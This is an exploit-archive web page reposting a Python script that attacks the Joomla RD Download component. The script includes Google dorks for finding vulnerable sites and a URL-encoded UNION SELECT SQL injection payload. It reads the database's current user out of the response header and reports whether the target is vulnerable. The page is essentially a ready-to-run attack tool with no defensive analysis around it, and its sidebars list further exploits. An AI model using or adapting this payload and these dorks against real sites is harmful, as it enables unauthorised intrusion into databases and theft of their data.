首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla RD Download SQL Injection
来源:http://www.homelab.it 作者:Viviani 发布时间:2014-10-31  
#!/usr/bin/python
#
# Exploit Name: Joomla RD Download SQL Injection
#
# Version: Unknown
#
# Exploit discovered and written by Claudio Viviani
#
# Dork google 1:  inurl:index.php?option=com_rd_download
# Dork google 2:  inurl:/component/rd_download/
#
# Tested on BackBox 3.x
#
# http connection
import urllib, urllib2
# string manipulation
import re
# Errors management
import sys
# Args management
import optparse

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url

banner = """
           _______                      __                                         
          |   _   .-----.-----.--------|  .---.-.                                  
          |___|   |  _  |  _  |        |  |  _  |                                  
          |.  |   |_____|_____|__|__|__|__|___._|                                  
          |:  1   |                                                                
          |::.. . |                                                                
          `-------'                                                                
           _______ ______       ______                        __                __ 
          |   _   |   _  \     |   _  \ .-----.--.--.--.-----|  .-----.---.-.--|  |
          |.  l   |.  |   \    |.  |   \|  _  |  |  |  |     |  |  _  |  _  |  _  |
          |.  _   |.  |    \   |.  |    |_____|________|__|__|__|_____|___._|_____|
          |:  |   |:  1    /   |:  1    /                                          
          |::.|:. |::.. . /    |::.. . /                                           
          `--- ---`------'     `------'                                            
                                                    J00ml4 RD D0wnl04d Sql1nj3ct10n

                                      Written by:

                                    Claudio Viviani

                                 http://www.homelab.it

                                    info@homelab.it
                                homelabit@protonmail.ch

                            https://www.facebook.com/homelabit
                              https://twitter.com/homelabit
                            https://plus.google.com/+HomelabIt1/
                   https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

commandList = optparse.OptionParser('usage: %prog -t URL')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )

options, remainder = commandList.parse_args()

# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)

host = checkurl(options.target)

evilurl = { '/component/rd_download/?view=download&task=dl&id=-5469%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%23' : '/component/rd_download/?view=download&task=dl&id=[SQLi]',
            '/index.php?option=com_rd_download&view=download&task=dl&id=-5469%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%23' : '/index.php?option=com_rd_download&view=download&task=dl&id=[SQLi]' }

print(banner)

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

for exploiting, dork in evilurl.iteritems():
   print "[*] Trying to connect to: "+host+dork
   try:
      req = urllib2.Request(host+exploiting, None, headers)
      response = urllib2.urlopen(req)

      response_header = response.info().getheader('Content-Disposition')
      if response_header:

         if "h0m3l4b1t" in response_header:
            print "[!] VULNERABLE"
            current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response_header).group(1)
            print "[*] Username: "+str(current_user)
            sys.exit(0)
         else:
            print "[X] Not vulnerable :("
      else:
         print "[X] Not vulnerable :("
   except urllib2.HTTPError as e:
      print("[X] Http Error: "+str(e.code))
   except urllib2.URLError as e:
      print("[X] Connection Error: "+str(e.code))
      sys.exit(1)

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MAARCH 1.4 - Arbitrary File Up
·GNU Wget FTP Symlink Arbitrary
·IBM Tivoli Monitoring 6.2.2 kb
·Xerox Multifunction Printers (
·Mini-stream RM-MP3 Converter 3
·Mac OS X Mavericks IOBluetooth
·CUPS Filter Bash Environment V
·Drupal < 7.32 Pre Auth SQL Inj
·vBulletin Tapatalk - Blind SQL
·Linux Local Root => 2.6.39 (32
·云端博弈——云安全入侵取证及思
·Linux/x86 Add map in /etc/host
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved